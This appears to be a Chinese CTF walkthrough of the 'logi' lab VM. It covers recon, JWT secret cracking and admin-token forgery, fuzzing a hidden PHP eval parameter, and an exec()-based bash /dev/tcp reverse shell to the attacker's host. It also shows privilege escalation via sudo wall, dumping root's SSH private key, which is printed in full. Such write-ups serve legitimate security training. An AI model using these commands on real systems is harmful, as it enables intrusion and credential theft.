信息收集 1 2 3 4 5 6 7 ┌──(root㉿kali)-[~] └─# arp-scan -l | grep PCS 192 .168 .31 .194 08 :00 :27 :18 :03 :eb PCS Systemtechnik GmbH┌──(root㉿kali)-[~] └─# IP=192 .168 .31 .194
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ┌──(root㉿kali)-[~] └─# nmap -sV -sC -A $IP -Pn Starting Nmap 7 .95 ( https://nmap.org ) at 2025 -09 -30 14 :25 EDT Nmap scan report for logi (192 .168 .31 .194 ) Host is up (0 .0017 s latency). Not shown: 998 closed tcp ports (reset)PORT STATE SERVICE VERSION 22 /tcp open ssh OpenSSH 8 .4 p1 Debian 5 +deb11u3 (protocol 2 .0 )| ssh-hostkey: | 3072 f6:a3:b6:78 :c4:62 :af:44 :bb:1 a:a0:0 c:08 :6 b:98 :f7 (RSA) | 256 bb:e8:a2:31 :d4:05 :a9:c9:31 :ff:62 :f6:32 :84 :21 :9 d (ECDSA) |_ 256 3 b:ae:34 :64 :4 f:a5:75 :b9:4 a:b9:81 :f9:89 :76 :99 :eb (ED25519) 80 /tcp open http Apache httpd 2 .4 .62 ((Debian))|_http-title : TI15 AME\xE5\x8A\xA9\xE5\xA8\x81 |_http-server-header: Apache/2 .4 .62 (Debian) MAC Address: 08 :00 :27 :18 :03 :EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type : general purpose Running: Linux 4.X |5.X OS CPE : cpe :/o:linux :linux_kernel :4 cpe :/o:linux :linux_kernel :5OS details : Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)Network Distance : 1 hop Service Info : OS : Linux ; CPE : cpe :/o:linux :linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.65 ms logi (192.168.31.194) OS and Service detection performed . Please report any incorrect results at https ://nmap.org /submit / .Nmap done : 1 IP address (1 host up ) scanned in 8.23 seconds
先看看首页有啥
1 2 3 4 ┌──(root㉿kali)-[~] └─# curl -s $IP ... <!--ame:jiayouachunyu-->
目录扫描 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ┌──(root㉿kali)-[~] └─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2 .3 -medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192 .168 .31 .194 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2 .3 -medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3 .6 [+] Extensions: zip,shtml,php,php3,tar,gz,txt,html,bk,bak [+] Timeout: 10 s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403 ) [Size: 278 ] /index.html (Status: 200 ) [Size: 3281 ] /.html (Status: 403 ) [Size: 278 ] /user (Status: 200 ) [Size: 2170 ] /user.php (Status: 200 ) [Size: 2170 ] /admin (Status: 200 ) [Size: 1576 ] /admin.php (Status: 200 ) [Size: 1576 ] /.html (Status: 403 ) [Size: 278 ] /.php (Status: 403 ) [Size: 278 ] /server-status (Status: 403 ) [Size: 278 ] Progress: 2426160 / 2426171 (100.00%) =============================================================== Finished ===============================================================
用 ame:jiayouachunyu 登录进 user.php 了,拿到 jwt
1 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9.iMbyjqjyjHxyQlTLdU8KmYdq7WlfnFQbQleI8-8lLpE
用 jwt_tool 爆破 jwt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~/Desktop/jwt_tool] └─$ python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTIxNDAwNSwiZXhwIjoxNzU5MjE3NjA1LCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9.3 _7R14x70FFFh6OI43EOvm31WwHKtQmS7s-hUdm7y1g -C -d "/usr/share/wordlists/rockyou.txt" \ \ \ \ \ \ \__ | | \ |\__ __| \__ __| | | | \ | | | \ \ | | \ | | | __ \ __ \ | \ | _ | | | | | | | | | | / \ | | | | | | | | \ | / \ | | |\ |\ | | \______/ \__/ \__| \__| \__| \______/ \______/ \__| Version 2 .3 .0 \______| @ticarpi /home/kali/.jwt_tool/jwtconf.ini Original JWT: [+] nevergiveup is the CORRECT key! You can tamper/fuzz the token contents (-T/-I) and sign it using: python3 jwt_tool.py [options here] -S hs256 -p "nevergiveup"
得到密钥 nevergiveup
在 JSON Web Tokens 解析发现 payload 是:
1 2 3 4 5 6 7 { "iss" : "moban" , "iat" : 1759257103 , "exp" : 1759260703 , "sub" : "ame" , "role" : "user" }
修改为:
1 2 3 4 5 6 7 { "iss" : "moban" , "iat" : 1759257103 , "exp" : 1759260703 , "sub" : "ame" , "role" : "admin" }
然后重新编码得到:
1 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoiYWRtaW4ifQ.LeStfNXO7i1_t7bhnHM7HL0uqMUoKC56XxQy3xkcjhQ
浏览器改一下 cookie 就进去了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 <!doctype html > <html lang ="zh-CN" > <head > <meta charset ="utf-8" > <meta name ="viewport" content ="width=device-width,initial-scale=1" > <title > Admin Area</title > <style > body {font-family :Segoe UI,Microsoft Yahei,Arial;background :#071029 ;color :#e6eef8 ;padding :30px } .card {max-width :900px ;margin :30px auto;padding :20px ;background :#081428 ;border-radius :8px } .btn {display :inline-block;padding :8px 12px ;border-radius :6px ;background :#1e90ff ;color :#fff ;text-decoration :none} .notice {color :#9fb0cc ;margin-top :8px } </style > </head > <body > <div class ="card" > <h2 > 欢迎 — 管理员</h2 > <p > 你好,ame。你的身份已通过验证。</p > <div style ="margin:16px 0;padding:12px;background:#061226;border-radius:6px" > <p > <strong > karsakarsa369.php</strong > </p > <p > https://www.jwt.io/</p > </div > </div > </body > </html >
根据提示来到 $IP/karsakarsa369.php
1 2 3 ┌──(root㉿kali)-[~] └─# curl -s $IP/karsakarsa369.php fuzz
提示说要 fuzz
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ┌──(root㉿kali)-[~] └─# ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2 .3 -medium.txt:FUZZ -u http://$IP/karsakarsa369.php?FUZZ=test -fs 4 -c /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1 .0 -dev ________________________________________________ :: Method : GET :: URL : http://192 .168 .31 .194 /karsakarsa369.php?FUZZ=test :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2 .3 -medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 -299 ,301 ,302 ,307 ,401 ,403 ,405 ,500 :: Filter : Response size: 4 ________________________________________________ :: Progress: [220559 /220559 ] :: Job [1 /1 ] :: 2040 req/sec :: Duration: [0 :01 :43 ] :: Errors: 0 ::
换了几个字典都没扫出来,猜测可能已经执行成功了只是没回显,试试看时间盲注
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ┌──(root㉿kali)-[~] └─# ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2 .3 -medium.txt:FUZZ -u "http://$IP/karsakarsa369.php?FUZZ=sleep(5 )%3 b" -mt '>4000 ' -timeout 10 -t 40 -c /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1 .0 -dev ________________________________________________ :: Method : GET :: URL : http://192 .168 .31 .194 /karsakarsa369.php?FUZZ=sleep(5 )%3 b :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2 .3 -medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response time : >4000 ________________________________________________ cmd [Status: 200 , Size: 4 , Words: 1 , Lines: 1 , Duration: 5013 ms]:: Progress: [220559 /220559 ] :: Job [1 /1 ] :: 8000 req/sec :: Duration: [0 :01 :30 ] :: Errors: 0 ::
扫出来参数 cmd 了,写个反弹 shell
一开始用 system 函数被拦了,看看被 ban 了哪些函数
1 2 3 ┌──(root㉿kali)-[~] └─# curl -g "http://$IP/karsakarsa369.php?cmd =print_r(ini_get('disable_functions'));" fuzzsystem,passthru,shell_exec,proc_open,pcntl_exec,dl
exec 没被 ban,就它了
1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root㉿kali)-[~] └─# curl -g "http://$IP/karsakarsa369.php?cmd =exec(%22bash% 20 -c%20'bash% 20 -i%20% 3 E%26% 20 /dev/tcp/192 .168 .31 .58 /4444 %200% 3 E%261'% 22 );" ┌──(root㉿kali)-[~] └─# nc -lvnp 4444 listening on [any] 4444 ... connect to [192 .168 .31 .58 ] from (UNKNOWN) [192 .168 .31 .194 ] 59080 bash: cannot set terminal process group (417): Inappropriate ioctl for device bash : no job control in this shell www -data @logi :/var /www /html $ id id uid =33(www -data ) gid =33(www -data ) groups =33(www -data )
稳定 shell
1 2 3 4 5 Ctrl + Z stty raw -echo; fg reset xterm export TERM=xterm export SHELL=/bin/bash
横向移动 查看最近修改的文件
1 2 3 4 www-data@logi:/var/www/html$ find /var -type f -printf '%T@ %TY-% Tm-%Td %TH:% TM %p\n' 2 >/dev/null | sort -nr | head -n 100 | cut -d' ' -f2- ... 2025 -09 -28 10 :47 /var/backups/passwd...
疑似密码文件
1 2 www-data@logi:/var/www/html$ cat /var/backups/passwd xiangwozheyangderen
尝试登录 ame
1 2 3 4 www-data@logi:/var/www/html$ su ame Password: ame @logi :/var /www /html $ id uid =1000(ame ) gid =1000(ame ) groups =1000(ame )
提权 列出当前用户允许通过 sudo 执行的命令
1 2 3 4 5 6 7 ame@logi:~$ sudo -l Matching Defaults entries for ame on logi : env_reset , mail_badpass , secure_path =/usr /local /sbin \:/usr /local /bin \://sbin \:/usr /bin \:/sbin \:/bin User ame may run the following commands on logi : (ALL ) NOPASSWD : /usr /bin /wall
查询 wall | GTFOBins 发现可用于提权
The textual file is dumped on the current TTY (neither to stdout nor to stderr).
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
LFILE=file_to_read
1 2 ame@logi:~$ sudo wall --nobanner "/root/.ssh/id_rsa" ame@logi:~$
然而这里却没有输出,这是因为 wall 命令的功能不是将内容输出到当前的 shell,而是将消息“广播”给所有当前登录到系统的用户的终端(TTY)www-data -> su ame 的会话是一个反弹 shell,这种 shell 不被系统视为一个标准的、交互式的登录终端(TTY),它本质上只是一个 socket 重定向了 /bin/bash 的输入输出流,因此当 wall 命令执行时反弹 shell 不在广播目标列表里
通过 ssh 登录再执行就好了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 ┌──(root㉿kali)-[~] └─# ssh ame@$IP The authenticity of host '192 .168 .31 .194 (192 .168 .31 .194 )' can't be established. ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:2 : [hashed name] ~/.ssh/known_hosts:4 : [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.31.194' (ED25519 ) to the list of known hosts . ame @192.168.31.194's password : Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 The programs included with the Debian GNU /Linux system are free software ;the exact distribution terms for each program are described in the individual files in /usr /share /doc /*/copyright .Debian GNU /Linux comes with ABSOLUTELY NO WARRANTY , to the extent permitted by applicable law .Last login : Sun Sep 28 10:35:26 2025 from 172.20.10.11ame @logi :~$ sudo wall --nobanner "/root /.ssh /id_rsa " -----BEGIN OPENSSH PRIVATE KEY ----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn NhAAAAAwEAAQAAAgEAnaT0B +kb64e8z3am +GYUeZQ91emxMpRnMWpP0kh3fZCoBJFf5PNX m6U1vZ33KCr84 +gPmwaSzbw6YooQ87sFGosSwHSM /qp4zio8 /PCHJicFgSxb +VFNdWu4gG VbfU12OMnAlIktH8HPr53z3UzaltGubxPxAm55i2XOAu2mXvZQ7KJpD7ONM1l02oCp24zZ dh3zIomqaEslfFEQz3TEkMhVxUBi7MIGM9khrrmbsZUthKQW1 /hGm9hle9tFOeWtBVdMpk zKRrgrNfEHMQ3gviNesmmvxKCTCmxTt0D37sFrE9qW9f3ZxSclXBNLEfNd66VtYhalvJdP nKIIh6dN1FCyzGtn9U +vKc4uT2Zz9cEh8gmbEZbCUTmQX +LPMcCzuDTZpUY783zMNiYo1Y vFaW2Nk0SWcdP1Q +wo2w6BSW9cjYSFwLkikVEIwxZ98J9mFLasEzAw4bQ2gSq1QxabjvWh g8 +w1U6nyBgcKmtY4mPi1kWu4Yq88JYsRLcTOl +CamSMPbwA6r5XKDgDaVPVrwqN4ix +dc sNJFnlSgS /gfT /MQUuXE5 /Tm2I4S6JoPsBlqaKsZvGz3U21HMQV0fA5CV0PVwvPBn2C +SB 2EwSNfSGp3lEL1q0 /UHy +Y0awsDOizhWxb /2TLsawf0OQgLykxyCbxr8E9aazVZ8mMJ9t4 EAAAdA5YGAIuWBgCIAAAAHc3NoLXJzYQAAAgEAnaT0B +kb64e8z3am +GYUeZQ91emxMpRn MWpP0kh3fZCoBJFf5PNXm6U1vZ33KCr84 +gPmwaSzbw6YooQ87sFGosSwHSM /qp4zio8 /P CHJicFgSxb +VFNdWu4gGVbfU12OMnAlIktH8HPr53z3UzaltGubxPxAm55i2XOAu2mXvZQ 7KJpD7ONM1l02oCp24zZdh3zIomqaEslfFEQz3TEkMhVxUBi7MIGM9khrrmbsZUthKQW1 / hGm9hle9tFOeWtBVdMpkzKRrgrNfEHMQ3gviNesmmvxKCTCmxTt0D37sFrE9qW9f3ZxScl XBNLEfNd66VtYhalvJdPnKIIh6dN1FCyzGtn9U +vKc4uT2Zz9cEh8gmbEZbCUTmQX +LPMc CzuDTZpUY783zMNiYo1YvFaW2Nk0SWcdP1Q +wo2w6BSW9cjYSFwLkikVEIwxZ98J9mFLas EzAw4bQ2gSq1QxabjvWhg8 +w1U6nyBgcKmtY4mPi1kWu4Yq88JYsRLcTOl +CamSMPbwA6r 5XKDgDaVPVrwqN4ix +dcsNJFnlSgS /gfT /MQUuXE5 /Tm2I4S6JoPsBlqaKsZvGz3U21HMQ V0fA5CV0PVwvPBn2C +SB2EwSNfSGp3lEL1q0 /UHy +Y0awsDOizhWxb /2TLsawf0OQgLykx yCbxr8E9aazVZ8mMJ9t4EAAAADAQABAAACACjO25D0qhKVZ6341A43NpOmaT9nqEQkoHXt RE52DeCGQsgz7bPxvjr /UGMOcj2Gq0I //1ItKHFziVWa0fqV7iNJ3wfM4 /bEoFMWIgWEKi gZL9aZahGnFzsPMIqkMkPEepcGuwB4ZiLzY9TdOZSO4YLrMpF0gw4TFQmdx ++AH3Izpw0q mbHD1Ah33sT1S4MW +fAWnqrRIjivQzvkLErXuk6UXYebPEB3lW10hsCZMZGNwWO1qmgrz / Nl2Bdw0oHDT7 +zMpdWB4K5CA6Fn0v2gLgXpdrfeu2Wd5naIu2sNsIqdZKFIlD5bpcXpBcq s2MpMaXfg +pBXJPuQ2CTnUuoZn /ohgAdRZWBRhz3BPAdj20YDZB1FR8d7gm8wuprr51t0y Qu3liLLv7utHZ6twV +twHEtLZcfk4u5nK5eUhdUQv7KnRjmO51XD0vgT9sJcdvrCo /EroU 1bErEML7Jx08s5d6veWyCaw0P9hxSYqWA /8sn +cBA4nRio4f835u42DL +asE8vvPpJgs +p SxZlTCc5j362BpB /r6tXbt5 /gVcAlY7eG9Mi0XQE6MrRVFPHvjj4aVrJoahAvuTSCOwKSr DuGas5MsupLXtsvnQ +OLXoLfmau9dJkwceV9boMWijy /GUjq2PuXMzZCIzGdke0tM2CDzl XtnMsZxZlM0I2hbKQVAAABAQCbUliOaBlCdEsZ /uhF3 +QP /+KepMQt5E2XCyZmEKbdvVXI BU5DfJidd00juWV25gS +JeKJ5AmGcJMJZxzFNmcb4S08ydUxs5J0BuYJLlT7Hl8Wx +cv7C xuI69zfVKrEuXu54kfkUmn6M5Aq +VlAvAms8IS67jbVKf /V2pKvT9cd /dGK +A5YVihGxeT 9ST8g3S /+FviJeyjuMK8WGYh6774LvlRufzvxBRevdO /zVKH2DAFLEWGEFkt9TEGS3MDri gMAnF9in23bJ3ksoEQjhcafQL +UXGalUTKWmbwEfvuXtX48j7a4G /0ejBbChKQdRLd2n7O +6hRr97q9jur4V8bAAABAQDJegrTfveMpUcwV9S9 /PHjaq9YD1WvUSXMjOGGrGZyvg /czz GDbb +G /NqojFFoswqQ8nl3yw9yOiHvanHLAdLyG /xB76X07cupVHnY +N +M5dAlXDYpE0bq P3XVWOGRz55ZJ +ylI3DKmGseqcAKVJNhc9B0ZzgpyYDjAldbngiHilV +7JxCIXzxN2GhAA UyQLAFBQ54UKMdrJtAQOXBvSZgZ06ZmDqqC0Z /+YTlZ8Jyezl5le4yG42ilSYal /E +W1sc 9Bmz3QFyvSP5pqTKy0 /xfvr6RO9LJbt6i5mME +V7VV77HkW7O11qFF2w2p /zOjXpyXM81N ueXYKFdXSQuPw /AAABAQDITkel25RoCYjYRG /oE2G7qcMwdUrVsas5o0cXdhav3oot121T Hfdk1d +ZmHgJ9GEwnn630xXEbKfpRxkNRhJN5MCNELGpMyY0PrTuT1Z +eajhsjtoFjIJ3y veWG /EMR1oeDIUfD8zIdZ9xTsUL3Z9iS3aLL5prq0 +byOCVQr7WQyiK /SNMmF6sRTNFHhy CTJ0i6yKFl +EEcG2O0KyGWNeCjXhmxOaM4J1SLXemfPmYLKJPjlp9 +/suJrOVZwrLLJe5w 3g0lGOKdY /B +KeiRBh7 +rM4s +n0LfG5AZWztTNBn1I8nI5Ox3VV2Xml +EHlA /jzgISDTGh yFwO2nf1b1w /AAAACXJvb3RAbG9naQE = -----END OPENSSH PRIVATE KEY -----
把私钥保存到一个攻击机上(我这里命名为 id_rsa_logi),清理掉每行末尾的空格和制表符后使用私钥登录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(root㉿kali)-[/home/kali/Desktop] └─# sed -i 's/[ \t]*$//' id_rsa_logi ┌──(root㉿kali)-[/home/kali/Desktop] └─# chmod 600 id_rsa_logi ┌──(root㉿kali)-[/home/kali/Desktop] └─# ssh -i id_rsa_logi root@$IP Linux logi 4 .19 .0 -27 -amd64 #1 SMP Debian 4 .19 .316 -1 (2024 -06 -25 ) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Sep 29 07 :40 :55 2025 from ::1 root@logi:~# id uid =0(root ) gid =0(root ) groups =0(root )
1 2 3 4 root@logi:~# cat /home/ame/user.txt user:{niudexiongdiniude} root@logi:~# cat /root/provemyself.txt root{xiangrootzheyangderen}
![logi[群友靶机]](https://gitlab.com/aristorechina/blog_imgur/-/raw/main/2025/ctf_writeup_cover_2dcbf3013efda15f.gif)
